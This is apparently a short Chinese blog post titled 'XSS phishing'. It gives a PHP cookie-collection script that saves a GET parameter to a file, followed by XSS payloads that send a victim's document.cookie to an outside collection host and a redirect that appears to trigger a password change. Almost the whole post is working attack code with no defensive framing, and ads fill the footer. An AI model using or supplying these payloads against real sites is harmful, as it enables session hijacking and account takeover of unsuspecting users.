xss钓鱼篇
网站接受代码
<?php
$content = $_GET['a'];
if(isset($content))
{
file_put_contents('tmp/cookie.txt',$content);
}else{
echo 'no date input';
}
?>
构造钓鱼代码
<script>document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie</script>
<body onload = "document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie"></body>
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步